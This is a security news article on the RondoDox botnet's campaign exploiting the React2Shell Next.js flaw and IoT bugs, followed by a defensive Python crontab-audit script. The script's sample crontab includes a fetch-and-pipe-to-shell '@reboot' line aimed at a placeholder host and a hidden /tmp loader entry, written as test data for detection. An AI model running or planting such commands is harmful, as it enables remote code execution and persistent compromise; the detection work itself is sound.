RondoDox Botnet Exploits Critical React2Shell Flaw To Hijack IoT Devices And Web Servers

Cybersecurity researchers have revealed details of a persistent nine-month campaign in which Internet of Things devices and web servers were targeted to recruit them into the RondoDox botnet. Observed activity through December 2025 indicates that the attackers exploited the recently disclosed React2Shell vulnerability, tracked as CVE-2025-55182 with a CVSS score of 10.0, to gain initial access. React2Shell affects React Server Components and Next.js, enabling unauthenticated attackers to execute remote commands on susceptible servers. According to Shadowserver Foundation data, approximately 90,300 instances remained vulnerable as of December 31, 2025, with the largest concentration in the U.S. at 68,400, followed by Germany, France, and India.

RondoDox, which first emerged in early 2025, has steadily expanded its toolkit, incorporating multiple N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, to broaden the botnet’s reach. Researchers from CloudSEK reported that the campaign progressed through three phases prior to the exploitation of React2Shell: initial reconnaissance and manual vulnerability scanning between March and April 2025, daily mass probing of web applications and IoT devices from April through June, and hourly automated deployment at scale from July through early December. Targets included web applications built on WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers, demonstrating the botnet’s focus on both enterprise and consumer devices.

In December 2025, the threat actors initiated scans to identify vulnerable Next.js servers and deployed multiple payloads on compromised systems. These included cryptocurrency miners hosted at “/nuts/poop,” a botnet loader and health checker at “/nuts/bolts,” and a Mirai botnet variant at “/nuts/x86.” The “/nuts/bolts” component is designed to eliminate competing malware, coin miners, and artifacts from previous campaigns, ensuring exclusive control of the infected devices. CloudSEK reported that this component scans the running processes listed under “/proc” every 45 seconds, terminates any executable not on its whitelist, and establishes persistence by modifying “/etc/crontab.” This systematic approach enables RondoDox to maintain control and prevent reinfection by rival botnets.

Security experts recommend that organizations mitigate the risk by updating Next.js to patched versions immediately, segmenting IoT devices into dedicated VLANs, deploying Web Application Firewalls, monitoring for unusual process execution, and blocking known command-and-control infrastructure. The RondoDox campaign highlights the growing threat posed by automated botnets that combine web server exploitation with IoT device hijacking to amplify computing resources, mine cryptocurrencies, and maintain persistent access across diverse network environments. Researchers continue to monitor the spread of the botnet and urge enterprises to adopt proactive security measures to prevent compromise of both web-facing applications and connected devices.
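Two of the behaviours described above, persistence through edits to /etc/crontab and recurring execution of unexpected binaries, are things a defender can audit directly on a host. The following is an added example written for this article, not code from CloudSEK or from the RondoDox campaign: it parses a system-format crontab, flags entries that match generic persistence patterns (execution from world-writable or hidden paths, fetch-and-pipe-to-shell commands, every-minute or @reboot schedules), and keeps a content fingerprint so later modifications can be detected. The sample crontab, the heuristic rules and their thresholds are constructed assumptions for illustration, not indicators taken from the campaign.

```python
"""Audit a system crontab for generic persistence patterns (added example)."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# Constructed sample, NOT a crontab recovered from any compromised host.
# Lines 5-7 are ordinary Debian defaults; lines 8-9 mimic the kind of entry
# a persistence mechanism might add and are what the audit should flag.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
* * * * *       root    /tmp/.x/loader >/dev/null 2>&1
@reboot         root    curl -s http://example.invalid/placeholder | sh
"""

# Heuristics (assumed, tune for your environment).
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")          # a "/.name" path component
AGGRESSIVE_SCHEDULES = {"* * * * *", "@reboot"}  # every minute, or at boot
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


@dataclass
class CronEntry:
    line_no: int
    schedule: str
    user: str
    command: str


def parse_system_crontab(text: str) -> list[CronEntry]:
    """Parse /etc/crontab-style lines: 5 time fields (or @special), user, command."""
    entries: list[CronEntry] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue  # blank, comment, or SHELL=/PATH= style assignment
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        entries.append(CronEntry(line_no, schedule, user, command))
    return entries


def suspicious_reasons(entry: CronEntry) -> list[str]:
    """Return the (possibly empty) list of heuristic hits for one entry."""
    reasons: list[str] = []
    cmd = entry.command
    if any(d in cmd for d in WRITABLE_DIRS):
        reasons.append("executes from world-writable directory")
    if HIDDEN_PATH.search(cmd):
        reasons.append("references hidden path")
    if FETCH_TO_SHELL.search(cmd):
        reasons.append("downloads content and pipes it to a shell")
    if entry.schedule in AGGRESSIVE_SCHEDULES:
        reasons.append(f"aggressive schedule ({entry.schedule})")
    return reasons


def audit_crontab(text: str) -> list[dict]:
    """Return one finding per entry that triggers at least one heuristic."""
    return [
        {"line": e.line_no, "user": e.user, "command": e.command, "reasons": reasons}
        for e in parse_system_crontab(text)
        if (reasons := suspicious_reasons(e))
    ]


def crontab_fingerprint(text: str) -> str:
    """SHA-256 of the file content; store it and re-check on a schedule."""
    return hashlib.sha256(text.encode()).hexdigest()


def crontab_changed(baseline_digest: str, current_text: str) -> bool:
    """True when the current content no longer matches the stored baseline."""
    return crontab_fingerprint(current_text) != baseline_digest


if __name__ == "__main__":
    # On a real host you would read /etc/crontab instead of the sample text.
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']} ({finding['user']}): {finding['command']}")
        for r in finding["reasons"]:
            print(f"    - {r}")
    print("baseline:", crontab_fingerprint(SAMPLE_CRONTAB))
```

The fingerprint check is deliberately simple: a known-good digest recorded at build or deployment time and compared periodically (or on an inotify event) catches any rewrite of the file regardless of content, while the heuristic rules give an analyst a first reason to look. Both are host-side complements to the network-level controls the recommendations above list; they do not replace patching Next.js.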
